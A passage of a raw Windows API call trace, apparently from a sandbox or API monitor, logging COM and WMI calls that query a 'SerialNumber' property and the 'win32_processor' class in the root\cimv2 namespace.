(This=0x1f837ddc) returned 0x1 [0239.627] CoGetContextToken (in: pToken=0x1fe1e490 | out: pToken=0x1fe1e490) returned 0x0 [0239.627] CoGetContextToken (in: pToken=0x1fe1e454 | out: pToken=0x1fe1e454) returned 0x0 [0239.628] IUnknown:QueryInterface (in: This=0x7421a0, riid=0x734c3ff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e488 | out: ppvObject=0x1fe1e488*=0x7421ac) returned 0x0 [0239.629] IComThreadingInfo:GetCurrentApartmentType (in: This=0x7421ac, pAptType=0x1fe1e4b8 | out: pAptType=0x1fe1e4b8*=3) returned 0x0 [0239.629] IUnknown:Release (This=0x7421ac) returned 0x1 [0239.636] CoGetContextToken (in: pToken=0x1fe1e488 | out: pToken=0x1fe1e488) returned 0x0 [0239.704] CoGetContextToken (in: pToken=0x1fe1e854 | out: pToken=0x1fe1e854) returned 0x0 [0239.707] LoadRegTypeLib (in: rguid=0x73bb364c*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x1fe1e838*=0x0 | out: pptlib=0x1fe1e838*=0x1f7db530) returned 0x0 [0239.710] ITypeLib:GetTypeInfoOfGuid (in: This=0x1f7db530, GUID=0x73bb55e4*(Data1=0x269ad56a, Data2=0x8a67, Data3=0x4129, Data4=([0]=0xbc, [1]=0x8c, [2]=0x5, [3]=0x6, [4]=0xdc, [5]=0xfe, [6]=0x98, [7]=0x80)), ppTInfo=0x2261bdb0 | out: ppTInfo=0x2261bdb0*=0x1f837e08) returned 0x0 [0239.711] IUnknown:Release (This=0x1f7db530) returned 0x6 [0239.711] IUnknown:AddRef (This=0x1f837e08) returned 0x2 [0239.712] DispGetIDsOfNames (in: ptinfo=0x1f837e08, rgszNames=0x1fe1e8b0*="SerialNumber", cNames=0x1, rgdispid=0x1fe1e8a0 | out: rgdispid=0x1fe1e8a0*=-1) returned 0x80020006 [0239.722] IUnknown:AddRef (This=0x2261d8c0) returned 0x3 [0239.723] IWbemClassObject:Get (in: This=0x2261d8c0, wszName="SerialNumber", lFlags=0, pVal=0x0, pType=0x0, plFlavor=0x1fe1e7c0*=0 | out: pVal=0x0, pType=0x0, plFlavor=0x1fe1e7c0*=0) returned 0x0 [0239.723] IUnknown:Release (This=0x2261d8c0) returned 0x2 [0239.723] SysStringLen (param_1="SerialNumber") returned 0xc [0239.724] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x22610a40 [0239.724] SysStringLen (param_1="SerialNumber") returned 0xc [0239.725] IUnknown:Release (This=0x1f837e08) returned 0x1 [0239.726] IUnknown:AddRef (This=0x1f837e08) returned 0x2 [0239.727] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0239.733] GetCurrentThreadId () returned 0x474 [0239.752] SysStringLen (param_1="SerialNumber") returned 0xc [0239.753] IWbemClassObject:Get (in: This=0x2261d8c0, wszName="SerialNumber", lFlags=0, pVal=0x1fe1e648*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1fe1e680, varVal2=0x73bb2d81), pType=0x1fe1e658*=1941646726, plFlavor=0x0 | out: pVal=0x1fe1e648*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\"1\"", varVal2=0x73bb2d81), pType=0x1fe1e658*=8, plFlavor=0x0) returned 0x0 [0239.754] IUnknown:Release (This=0x1f837e08) returned 0x1 [0239.755] SysStringLen (param_1="\"1\"") returned 0x3 [0239.839] CoGetContextToken (in: pToken=0x1fe1eb10 | out: pToken=0x1fe1eb10) returned 0x0 [0239.840] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0239.845] GetCurrentThreadId () returned 0x474 [0239.858] IUnknown:AddRef (This=0x2261d884) returned 0x3 [0239.858] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0239.863] GetCurrentThreadId () returned 0x474 [0239.876] IEnumWbemClassObject:Next (in: This=0x2261d884, lTimeout=-1, uCount=0x1, apObjects=0x1fe1ec48, puReturned=0x1fe1ec40 | out: apObjects=0x1fe1ec48*=0x0, puReturned=0x1fe1ec40*=0x0) returned 0x1 [0239.885] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x1fe1ebfc | out: pperrinfo=0x1fe1ebfc*=0x0) returned 0x1 [0239.891] IUnknown:Release (This=0x2261d884) returned 0x2 [0239.897] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x1fe1ec40 | out: pperrinfo=0x1fe1ec40*=0x0) returned 0x1 [0243.994] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6e4 [0243.995] GetLastError () returned 0x0 [0244.148] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6f4 [0244.148] GetLastError () returned 0x0 [0244.816] SetEvent (hEvent=0x6f4) returned 1 [0244.817] GetLastError () returned 0x0 [0244.871] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1fe1ec50*=0x6e4, lpdwindex=0x1fe1ea08 | out: lpdwindex=0x1fe1ea08) returned 0x0 [0249.970] CoGetContextToken (in: pToken=0x1fe1eaa0 | out: pToken=0x1fe1eaa0) returned 0x0 [0249.971] CoGetContextToken (in: pToken=0x1fe1ea60 | out: pToken=0x1fe1ea60) returned 0x0 [0249.971] WbemDefPath:IUnknown:AddRef (This=0x2261fd10) returned 0x2 [0249.973] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd10, riid=0x1fe1eadc*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1ead8 | out: ppvObject=0x1fe1ead8*=0x2261fd10) returned 0x0 [0249.974] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x2 [0249.975] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x1 [0250.107] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x71c [0250.107] GetLastError () returned 0x0 [0250.107] SetEvent (hEvent=0x6f4) returned 1 [0250.127] GetLastError () returned 0x0 [0250.144] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1fe1e474*=0x71c, lpdwindex=0x1fe1e22c | out: lpdwindex=0x1fe1e22c) returned 0x0 [0250.216] CoGetContextToken (in: pToken=0x1fe1e2c4 | out: pToken=0x1fe1e2c4) returned 0x0 [0250.216] CoGetContextToken (in: pToken=0x1fe1e284 | out: pToken=0x1fe1e284) returned 0x0 [0250.217] WbemDefPath:IUnknown:AddRef (This=0x2261fda8) returned 0x2 [0250.217] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fda8, riid=0x1fe1e300*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1e2fc | out: ppvObject=0x1fe1e2fc*=0x2261fda8) returned 0x0 [0250.218] WbemDefPath:IUnknown:Release (This=0x2261fda8) returned 0x2 [0250.219] WbemDefPath:IUnknown:Release (This=0x2261fda8) returned 0x1 [0250.526] CoGetContextToken (in: pToken=0x1fe1e344 | out: pToken=0x1fe1e344) returned 0x0 [0250.526] CoGetContextToken (in: pToken=0x1fe1e304 | out: pToken=0x1fe1e304) returned 0x0 [0250.526] WbemDefPath:IUnknown:AddRef (This=0x2261fda8) returned 0x2 [0250.527] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fda8, riid=0x1fe1e380*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1e37c | out: ppvObject=0x1fe1e37c*=0x2261fda8) returned 0x0 [0250.528] WbemDefPath:IUnknown:Release (This=0x2261fda8) returned 0x2 [0250.529] WbemDefPath:IWbemPath:SetText (This=0x2261fda8, uMode=0x4, pszPath="//./root/cimv2") returned 0x0 [0250.530] WbemDefPath:IUnknown:Release (This=0x2261fda8) returned 0x1 [0250.605] CoGetContextToken (in: pToken=0x1fe1eb20 | out: pToken=0x1fe1eb20) returned 0x0 [0250.605] CoGetContextToken (in: pToken=0x1fe1eae0 | out: pToken=0x1fe1eae0) returned 0x0 [0250.606] WbemDefPath:IUnknown:AddRef (This=0x2261fd10) returned 0x2 [0250.606] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd10, riid=0x1fe1eb5c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eb58 | out: ppvObject=0x1fe1eb58*=0x2261fd10) returned 0x0 [0250.608] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x2 [0250.609] WbemDefPath:IWbemPath:SetText (This=0x2261fd10, uMode=0x4, pszPath="win32_processor") returned 0x0 [0250.609] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x1 [0250.790] CoGetContextToken (in: pToken=0x1fe1eb0c | out: pToken=0x1fe1eb0c) returned 0x0 [0250.790] CoGetContextToken (in: pToken=0x1fe1eacc | out: pToken=0x1fe1eacc) returned 0x0 [0250.790] WbemDefPath:IUnknown:AddRef (This=0x2261fd10) returned 0x2 [0250.791] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd10, riid=0x1fe1eb48*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eb44 | out: ppvObject=0x1fe1eb44*=0x2261fd10) returned 0x0 [0250.793] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x2 [0250.794] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x2261fd10, puCount=0x1fe1ecc0 | out: puCount=0x1fe1ecc0*=0x0) returned 0x0 [0250.794] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x1 [0250.988] CoGetContextToken (in: pToken=0x1fe1eafc | out: pToken=0x1fe1eafc) returned 0x0 [0250.989] CoGetContextToken (in: pToken=0x1fe1eabc | out: pToken=0x1fe1eabc) returned 0x0 [0250.989] WbemDefPath:IUnknown:AddRef (This=0x2261fd10) returned 0x2 [0250.990] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd10, riid=0x1fe1eb38*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eb34 | out: ppvObject=0x1fe1eb34*=0x2261fd10) returned 0x0 [0250.992] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x2 [0250.994] WbemDefPath:IWbemPath:GetText (in: This=0x2261fd10, lFlags=2, puBuffLength=0x1fe1ecbc*=0x0, pszText=0x0 | out: puBuffLength=0x1fe1ecbc*=0x10, pszText=0x0) returned 0x0 [0250.994] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x1 [0250.997] CoGetContextToken (in: pToken=0x1fe1eafc | out: pToken=0x1fe1eafc) returned 0x0 [0250.997] CoGetContextToken (in: pToken=0x1fe1eabc | out: pToken=0x1fe1eabc) returned 0x0 [0250.997] WbemDefPath:IUnknown:AddRef (This=0x2261fd10) returned 0x2 [0250.998] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd10, riid=0x1fe1eb38*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eb34 | out: ppvObject=0x1fe1eb34*=0x2261fd10) returned 0x0 [0251.000] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x2 [0251.001] WbemDefPath:IWbemPath:GetText (in: This=0x2261fd10, lFlags=2, puBuffLength=0x1fe1ecbc*=0x10, pszText="000000000000000" | out: puBuffLength=0x1fe1ecbc*=0x10, pszText="win32_processor") returned 0x0 [0251.002] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x1 [0251.178] CoGetContextToken (in: pToken=0x1fe1eb10 | out: pToken=0x1fe1eb10) returned 0x0 [0251.178] CoGetContextToken (in: pToken=0x1fe1ead0 | out: pToken=0x1fe1ead0) returned 0x0 [0251.179] WbemDefPath:IUnknown:AddRef (This=0x2261fd10) returned 0x2 [0251.179] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd10, riid=0x1fe1eb4c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eb48 | out: ppvObject=0x1fe1eb48*=0x2261fd10) returned 0x0 [0251.181] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x2 [0251.181] WbemDefPath:IWbemPath:GetInfo (in: This=0x2261fd10, uRequestedInfo=0x0, puResponse=0x1fe1ecc4 | out: puResponse=0x1fe1ecc4*=0xc15) returned 0x0 [0251.182] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x1 [0251.183] CoGetContextToken (in: pToken=0x1fe1eb0c | out: pToken=0x1fe1eb0c) returned 0x0 [0251.183] CoGetContextToken (in: pToken=0x1fe1eacc | out: pToken=0x1fe1eacc) returned 0x0 [0251.184] WbemDefPath:IUnknown:AddRef (This=0x2261fd10) returned 0x2 [0251.184] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd10, riid=0x1fe1eb48*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eb44 | out: ppvObject=0x1fe1eb44*=0x2261fd10) returned 0x0 [0251.185] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x2 [0251.186] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x2261fd10, puCount=0x1fe1ecc0 | out: puCount=0x1fe1ecc0*=0x0) returned 0x0 [0251.186] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x1 [0251.197] CoGetContextToken (in: pToken=0x1fe1eb10 | out: pToken=0x1fe1eb10) returned 0x0 [0251.197] CoGetContextToken (in: pToken=0x1fe1ead0 | out: pToken=0x1fe1ead0) returned 0x0 [0251.198] WbemDefPath:IUnknown:AddRef (This=0x2261fd10) returned 0x2 [0251.198] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd10, riid=0x1fe1eb4c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eb48 | out: ppvObject=0x1fe1eb48*=0x2261fd10) returned 0x0 [0251.199] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x2 [0251.200] WbemDefPath:IWbemPath:GetInfo (in: This=0x2261fd10, uRequestedInfo=0x0, puResponse=0x1fe1ecc4 | out: puResponse=0x1fe1ecc4*=0xc15) returned 0x0 [0251.200] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x1 [0251.202] CoGetContextToken (in: pToken=0x1fe1eb00 | out: pToken=0x1fe1eb00) returned 0x0 [0251.202] CoGetContextToken (in: pToken=0x1fe1eac0 | out: pToken=0x1fe1eac0) returned 0x0 [0251.202] WbemDefPath:IUnknown:AddRef (This=0x2261fd10) returned 0x2 [0251.202] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd10, riid=0x1fe1eb3c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eb38 | out: ppvObject=0x1fe1eb38*=0x2261fd10) returned 0x0 [0251.204] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x2 [0251.205] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x2261fd10, puCount=0x1fe1ecb4 | out: puCount=0x1fe1ecb4*=0x0) returned 0x0 [0251.205] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x1 [0251.206] CoGetContextToken (in: pToken=0x1fe1eaf0 | out: pToken=0x1fe1eaf0) returned 0x0 [0251.206] CoGetContextToken (in: pToken=0x1fe1eab0 | out: pToken=0x1fe1eab0) returned 0x0 [0251.206] WbemDefPath:IUnknown:AddRef (This=0x2261fd10) returned 0x2 [0251.207] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd10, riid=0x1fe1eb2c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eb28 | out: ppvObject=0x1fe1eb28*=0x2261fd10) returned 0x0 [0251.208] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x2 [0251.209] WbemDefPath:IWbemPath:GetText (in: This=0x2261fd10, lFlags=2, puBuffLength=0x1fe1ecb0*=0x0, pszText=0x0 | out: puBuffLength=0x1fe1ecb0*=0x10, pszText=0x0) returned 0x0 [0251.209] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x1 [0251.210] CoGetContextToken (in: pToken=0x1fe1eaf0 | out: pToken=0x1fe1eaf0) returned 0x0 [0251.210] CoGetContextToken (in: pToken=0x1fe1eab0 | out: pToken=0x1fe1eab0) returned 0x0 [0251.210] WbemDefPath:IUnknown:AddRef (This=0x2261fd10) returned 0x2 [0251.211] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd10, riid=0x1fe1eb2c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eb28 | out: ppvObject=0x1fe1eb28*=0x2261fd10) returned 0x0 [0251.212] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x2 [0251.213] WbemDefPath:IWbemPath:GetText (in: This=0x2261fd10, lFlags=2, puBuffLength=0x1fe1ecb0*=0x10, pszText="000000000000000" | out: puBuffLength=0x1fe1ecb0*=0x10, pszText="win32_processor") returned 0x0 [0251.213] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x1 [0251.214] CoGetContextToken (in: pToken=0x1fe1eb00 | out: pToken=0x1fe1eb00) returned 0x0 [0251.214] CoGetContextToken (in: pToken=0x1fe1eac0 | out: pToken=0x1fe1eac0) returned 0x0 [0251.214] WbemDefPath:IUnknown:AddRef (This=0x2261fd10) returned 0x2 [0251.215] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd10, riid=0x1fe1eb3c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eb38 | out: ppvObject=0x1fe1eb38*=0x2261fd10) returned 0x0 [0251.216] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x2 [0251.217] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x2261fd10, puCount=0x1fe1ecb4 | out: puCount=0x1fe1ecb4*=0x0) returned 0x0 [0251.217] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x1 [0251.218] CoGetContextToken (in: pToken=0x1fe1eaf0 | out: pToken=0x1fe1eaf0) returned 0x0 [0251.218] CoGetContextToken (in: pToken=0x1fe1eab0 | out: pToken=0x1fe1eab0) returned 0x0 [0251.218] WbemDefPath:IUnknown:AddRef (This=0x2261fd10) returned 0x2 [0251.219] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd10, riid=0x1fe1eb2c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eb28 | out: ppvObject=0x1fe1eb28*=0x2261fd10) returned 0x0 [0251.220] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x2 [0251.220] WbemDefPath:IWbemPath:GetText (in: This=0x2261fd10, lFlags=2, puBuffLength=0x1fe1ecb0*=0x0, pszText=0x0 | out: puBuffLength=0x1fe1ecb0*=0x10, pszText=0x0) returned 0x0 [0251.221] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x1 [0251.221] CoGetContextToken (in: pToken=0x1fe1eaf0 | out: pToken=0x1fe1eaf0) returned 0x0 [0251.222] CoGetContextToken (in: pToken=0x1fe1eab0 | out: pToken=0x1fe1eab0) returned 0x0 [0251.222] WbemDefPath:IUnknown:AddRef (This=0x2261fd10) returned 0x2 [0251.222] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd10, riid=0x1fe1eb2c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eb28 | out: ppvObject=0x1fe1eb28*=0x2261fd10) returned 0x0 [0251.223] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x2 [0251.224] WbemDefPath:IWbemPath:GetText (in: This=0x2261fd10, lFlags=2, puBuffLength=0x1fe1ecb0*=0x10, pszText="000000000000000" | out: puBuffLength=0x1fe1ecb0*=0x10, pszText="win32_processor") returned 0x0 [0251.224] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x1 [0251.245] CoGetContextToken (in: pToken=0x1fe1ea94 | out: pToken=0x1fe1ea94) returned 0x0 [0251.245] CoGetContextToken (in: pToken=0x1fe1ea54 | out: pToken=0x1fe1ea54) returned 0x0 [0251.245] WbemDefPath:IUnknown:AddRef (This=0x2261fd10) returned 0x2 [0251.246] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fd10, riid=0x1fe1ead0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eacc | out: ppvObject=0x1fe1eacc*=0x2261fd10) returned 0x0 [0251.247] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x2 [0251.248] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x2261fd10, puCount=0x1fe1ec48 | out: puCount=0x1fe1ec48*=0x0) returned 0x0 [0251.248] WbemDefPath:IUnknown:Release (This=0x2261fd10) returned 0x1 [0251.251] CoGetContextToken (in: pToken=0x1fe1ea80 | out: pToken=0x1fe1ea80) returned 0x0 [0251.251] CoGetContextToken (in: pToken=0x1fe1ea40 | out: pToken=0x1fe1ea40) returned 0x0 [0251.251] WbemDefPath:IUnknown:AddRef (This=0x2261fda8) returned 0x2 [0251.252] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fda8, riid=0x1fe1eabc*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eab8 | out: ppvObject=0x1fe1eab8*=0x2261fda8) returned 0x0 [0251.253] WbemDefPath:IUnknown:Release (This=0x2261fda8) returned 0x2 [0251.254] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x2261fda8, puCount=0x1fe1ec34 | out: puCount=0x1fe1ec34*=0x2) returned 0x0 [0251.254] WbemDefPath:IUnknown:Release (This=0x2261fda8) returned 0x1 [0251.255] CoGetContextToken (in: pToken=0x1fe1ea70 | out: pToken=0x1fe1ea70) returned 0x0 [0251.256] CoGetContextToken (in: pToken=0x1fe1ea30 | out: pToken=0x1fe1ea30) returned 0x0 [0251.256] WbemDefPath:IUnknown:AddRef (This=0x2261fda8) returned 0x2 [0251.256] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fda8, riid=0x1fe1eaac*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eaa8 | out: ppvObject=0x1fe1eaa8*=0x2261fda8) returned 0x0 [0251.258] WbemDefPath:IUnknown:Release (This=0x2261fda8) returned 0x2 [0251.259] WbemDefPath:IWbemPath:GetText (in: This=0x2261fda8, lFlags=4, puBuffLength=0x1fe1ec30*=0x0, pszText=0x0 | out: puBuffLength=0x1fe1ec30*=0xf, pszText=0x0) returned 0x0 [0251.259] WbemDefPath:IUnknown:Release (This=0x2261fda8) returned 0x1 [0251.260] CoGetContextToken (in: pToken=0x1fe1ea70 | out: pToken=0x1fe1ea70) returned 0x0 [0251.260] CoGetContextToken (in: pToken=0x1fe1ea30 | out: pToken=0x1fe1ea30) returned 0x0 [0251.260] WbemDefPath:IUnknown:AddRef (This=0x2261fda8) returned 0x2 [0251.261] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261fda8, riid=0x1fe1eaac*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eaa8 | out: ppvObject=0x1fe1eaa8*=0x2261fda8) returned 0x0 [0251.262] WbemDefPath:IUnknown:Release (This=0x2261fda8) returned 0x2 [0251.263] WbemDefPath:IWbemPath:GetText (in: This=0x2261fda8, lFlags=4, puBuffLength=0x1fe1ec30*=0xf, pszText="00000000000000" | out: puBuffLength=0x1fe1ec30*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0251.268] WbemDefPath:IUnknown:Release (This=0x2261fda8) returned 0x1 [0251.269] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x724 [0251.269] GetLastError () returned 0x0 [0251.269] SetEvent (hEvent=0x6f4) returned 1 [0251.271] GetLastError () returned 0x0 [0251.272] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1fe1eb98*=0x724, lpdwindex=0x1fe1e950 | out: lpdwindex=0x1fe1e950) returned 0x0 [0251.326] CoGetContextToken (in: pToken=0x1fe1e9e8 | out: pToken=0x1fe1e9e8) returned 0x0 [0251.326] CoGetContextToken (in: pToken=0x1fe1e9a8 | out: pToken=0x1fe1e9a8) returned 0x0 [0251.326] WbemDefPath:IUnknown:AddRef (This=0x2261daa8) returned 0x2 [0251.327] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261daa8, riid=0x1fe1ea24*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1ea20 | out: ppvObject=0x1fe1ea20*=0x2261daa8) returned 0x0 [0251.328] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x2 [0251.329] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x1 [0251.330] CoGetContextToken (in: pToken=0x1fe1ea68 | out: pToken=0x1fe1ea68) returned 0x0 [0251.330] CoGetContextToken (in: pToken=0x1fe1ea28 | out: pToken=0x1fe1ea28) returned 0x0 [0251.331] WbemDefPath:IUnknown:AddRef (This=0x2261daa8) returned 0x2 [0251.331] WbemDefPath:IUnknown:QueryInterface (in: This=0x2261daa8, riid=0x1fe1eaa4*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1fe1eaa0 | out: ppvObject=0x1fe1eaa0*=0x2261daa8) returned 0x0 [0251.332] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x2 [0251.333] WbemDefPath:IWbemPath:SetText (This=0x2261daa8, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0251.333] WbemDefPath:IUnknown:Release (This=0x2261daa8) returned 0x1 [0251.334] CoGetContextToken (in: pToken=0x1fe1ea58 | out: pToken=0x1fe1ea58) returned 0x0 [0251.335] CoGetContextToken (in: pToken=0x1fe1ea18 | out: pToken=0x1fe1ea18) returned 0x0 [0251.335] 